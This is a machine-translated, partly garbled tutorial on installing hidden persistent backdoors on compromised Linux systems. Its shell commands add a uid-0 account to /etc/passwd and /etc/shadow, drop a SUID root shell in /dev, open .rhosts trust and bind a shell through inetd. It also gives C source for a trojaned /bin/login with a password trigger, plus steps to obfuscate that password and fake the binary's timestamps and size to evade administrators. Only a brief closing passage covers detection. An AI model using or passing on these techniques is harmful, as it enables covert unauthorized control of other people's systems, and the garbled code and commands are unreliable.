Hacker technology advanced skills and practice Linux backdoors

Introduction to intruders full back door control system, to facilitate the next time you access and use of a technology.

General by modifying the system configuration file and install a third-party tools to implement the back door. Has a hidden, can bypass the system log, not easily found by the system administrator. Common backdoor technology increase root # echo "e4gle: x: 0: 0::/:/bin/sh" > >/etc/passwd # echo "e4gle::-1:-1:-1:-1:-1:-1: 500" > >/etc/shadow if the system does not allow the uid = 0 in the user log in remotely, you also need to add a normal user account. Crack/sniff the user password for shadow file, use a tool to crack weak JohntheRipper user password. Installation tools, such as sniff sniffit listens to telnet, FTP port, collect the user's password. Place the SUIDSell # cp/bin/bash/dev/.rootsell # chmodu + s/dev/.rootsell ordinary users to run in native, you can obtain a/dev/.rootshell root permissions of shell. Rhosts ++ # echo "+ +" >/.rosts # rsh-lrootvictim.comcs-I can get a rootshell remotely. Use of system services program. Modify/etc/inetd.conf, daytimestreamtcpnowait/bin/shsh-I; replace with the trojan programs, such as in.telnetd in.rexecd inted service program, redirect login program. TCP/UDP/ICMPSellBindShell, mostly based on TCP/UDP protocols of network services programs, high port sniffing, can easily be found. PingBackdoor ICMP packet activation by a Shell back door. TCPACK packet back door, to be able to travel across the firewall. Crontab scheduled task scheduling through the Crontab program installed backdoor scheduled run, usually in the late evening hours, is the system administrator is not online. Shared library file in a shared library embedded backdoor function uses the backdoor password activation Shell, obtain permission to escape the system administrator on binary checksum of the file itself. Kit Rootkit contains a series of systems and the backdoor tool:-clear log in logon log-camouflage checksum-replace netstat, ps, and other network tools-backdoor login program is easy to install and use to load kernel modules (LKM) LKM: dynamic loading of LoadableKernelModules, do not need to recompile the kernel. Intercepted system call, with the hidden directories, files, processes, network connections, and other powerful features. Their invisibility, find difficult. Famous adore LKM and knark Pack. Backdoor detection to my own experience, combined with specific tools, hand work some testing. Use md5 checksum Tripwire or to check the system. With the IDS system, listen to the target machine's suspicious network connection. Example: Login backdoor intruder put original/bin/login backup, and then replace with a paragraph/bin/login. Intruder Telnet came in through the environment variable, or a terminal type, pass the correct backdoor password, will directly receive a Shell; if it is a normal user log in, you will be redirected to the original login file, to handle the normal login. The most simple login backdoor ulogin.c source: instance: login backdoor # include "passWORD" # definePASSWORD # define_PATH_LOGIN "/sbin/logins" main (argc, argv, envp) intargc; char ** argv, * the * envp; {char * display = getenv ("DISPLAY"); if (display == NULL) {execve (_PATH_LOGIN, argv, envp);　　 perror(_PATH_LOGIN); exit(1); }　if(!strcmp(display,PASSWORD)){　　system(”/bin/cs”); exit(1); }　execve(_PATH_LOGIN,argv,envp); exit(1);} Use the backdoor login first Telnet service is turned on, on your own machine: bash $ exportDISPLAY = passWORDbash $ telnetvictim.comTryingxxx.xxx.xxx.xxx ... Connectedtovictim.com (xxx.xxx.xxx.xxx) .Escapecharacteris '' ^] '.% _Strings command strings command can print out a binary file to display the string used to earlier ulogin program: bash $ stringsulogin/lib/ld-linux.so.2..............DISPLAY/sbin/loginspassWORD/bin/cs backdoor password encrypted, using the DES algorithm 1, the crypt () function, write gen.c program: # include main (intargc,char*argv[]){if(argc!=3){printf(”usage:%s\n”,argv[0]);exit(1);} printf(”%s\n”,crypt(argv[1],argv[2]));} 2. compile-gen, perform., the shadow/genhackui result UiVqMWvDrIQjA. 3. modify the backdoor program ulogin. c:--ciphertext form of password in place of the macro in the define ulogin.c PASSWORD value. --If the backdoor password incorrect, directly to a Shell: if (! strcmp (PASSWORD, crypt (display, PASSWORD))) {system (SHELL); exit (1);} Use strings command can only see the encrypted password. Use exclusive-or (XOR) algorithm, a string in hexadecimal representation, in order to achieve the non-printable effect. 1, encoding program encode.c: charmagic [] = "\x71\x67\x6d\x7a\x65\x61\x7a"; char * de (char * str, char * key) {inti = 0, j = 0, len; len = strlen (key); while (str [I]! = ' \0 ') {str [I] ^ = key [j]; j ++; if (j = = len), j = 0; I ++;} returnstr;} voiddisplay(char*str){inti;for(i=0;i main(){chargets[100],*ptr;ptr=gets;scanf(”%s”,ptr);de(ptr,magic);display(ptr);} 2. compile the encode, get key string executed sequentially and magic string XOR result, for example the filename of the original login/sbin/xlogin, exclusive or after: \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3, in such a definition in the source code of the back door: Carlogin [] = "\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb"; and then insert the XOR function, char * de () with the same magic strings, we can figure out the correct backdoor passwords. Use strings command cannot see passwords, path string. Last modified so that the backdoor ulogin of strings output similar to the normal login strings output, practices: the code in ulogin.c by adding a string array charstrings [] = ""; fill in the quotation marks, the normal login program strings output. Confused as real ones, to increase the temptation. Adjust the backdoor's file date, size, and other properties: 1, date # ls-l/sbin/xlogin-r-sr-xr-xrootroot19300Feb111998/sbin/xlogin # touch-t199802110000ulogin # _2, size # ls-lulogin/sbin/xlogin-r-sr-xr-xrootroot7542Feb111998ulogin-r-sr-xr-xrootroot19300Feb111998/sbin/xlogin # bc19300-754211758 # ddif =/sbin/xloginof =/tmp/tbs = 11758count = 11 + 0recordsin1 + 0recordsout11758bytestransferredin0.000379secs (31016746bytes/sec) # cat/tmp/t > > uloginLogin backdoor detection using the command md5sum on the existing/bin/login file for verification, and the previous value for comparison. Use the RPM checksum RedHatLinux: # rpm-Vutil-linux intruders have used backdoor login, who will not be visible to users, see the system process, find login-hxxx.xxx.xxx.xxx.